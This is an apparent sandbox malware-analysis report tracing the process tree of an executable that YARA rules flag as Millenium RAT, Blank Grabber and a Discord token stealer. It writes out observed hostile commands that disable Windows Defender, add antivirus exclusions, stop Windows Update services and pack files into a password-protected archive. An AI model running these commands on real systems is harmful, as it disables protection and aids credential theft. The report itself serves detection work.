                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                        Function NameHook TypeNew Data
                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:21:56:14
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\TS-240605-Millenium1.exe"
                                                                                        Imagebase:0x7ff6ceb20000
                                                                                        File size:38'730'377 bytes
                                                                                        MD5 hash:4CE7DEC7F0AF15277EEC727A9E20142E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:21:56:17
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\TS-240605-Millenium1.exe"
                                                                                        Imagebase:0x7ff6ceb20000
                                                                                        File size:38'730'377 bytes
                                                                                        MD5 hash:4CE7DEC7F0AF15277EEC727A9E20142E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:21:56:17
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:21:56:17
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:21:56:18
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
                                                                                        Imagebase:0x360000
                                                                                        File size:32'972'420 bytes
                                                                                        MD5 hash:B72CBBAF7F2E3E31E90944AC747798D3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:21:56:20
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                        Imagebase:0x7ff647770000
                                                                                        File size:25'152'315 bytes
                                                                                        MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 67%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:21:56:20
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\Microsoft\based.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                        Imagebase:0x7ff7dfd20000
                                                                                        File size:7'759'042 bytes
                                                                                        MD5 hash:363F8437904AD603ECDF0D5329610D88
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 51%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:21:56:21
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\Microsoft\based.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                        Imagebase:0x7ff7dfd20000
                                                                                        File size:7'759'042 bytes
                                                                                        MD5 hash:363F8437904AD603ECDF0D5329610D88
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:21:56:22
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                        Imagebase:0x7ff647770000
                                                                                        File size:25'152'315 bytes
                                                                                        MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:21:56:22
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:21:56:22
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:21:56:22
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
                                                                                        Imagebase:0xce0000
                                                                                        File size:19'846'974 bytes
                                                                                        MD5 hash:8198AD352AB70C2C974AB5C716956CD7
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:21:56:24
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:21:56:25
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\main.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\main.exe"
                                                                                        Imagebase:0x25eb5a30000
                                                                                        File size:5'872'344 bytes
                                                                                        MD5 hash:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 83%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:21:56:25
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\svchost.exe"
                                                                                        Imagebase:0x7ff621880000
                                                                                        File size:12'576'970 bytes
                                                                                        MD5 hash:48B277A9AC4E729F9262DD9F7055C422
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 74%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:23
                                                                                        Start time:21:56:25
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\setup.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\setup.exe"
                                                                                        Imagebase:0x7ff65f170000
                                                                                        File size:5'617'152 bytes
                                                                                        MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 88%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:24
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:25
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:28
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:tasklist /FO LIST
                                                                                        Imagebase:0x7ff633870000
                                                                                        File size:106'496 bytes
                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:30
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:tasklist /FO LIST
                                                                                        Imagebase:0x7ff633870000
                                                                                        File size:106'496 bytes
                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:31
                                                                                        Start time:21:56:26
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:32
                                                                                        Start time:21:56:30
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\ProgramData\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\ProgramData\svchost.exe"
                                                                                        Imagebase:0x7ff621880000
                                                                                        File size:12'576'970 bytes
                                                                                        MD5 hash:48B277A9AC4E729F9262DD9F7055C422
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:34
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:35
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:36
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:37
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:38
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:sc stop UsoSvc
                                                                                        Imagebase:0x7ff6b7320000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:39
                                                                                        Start time:21:56:31
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
                                                                                        Imagebase:0x7ff7085c0000
                                                                                        File size:630'736 bytes
                                                                                        MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:40
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:41
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:42
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:sc stop WaaSMedicSvc
                                                                                        Imagebase:0x7ff6b7320000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:43
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\sc.exe
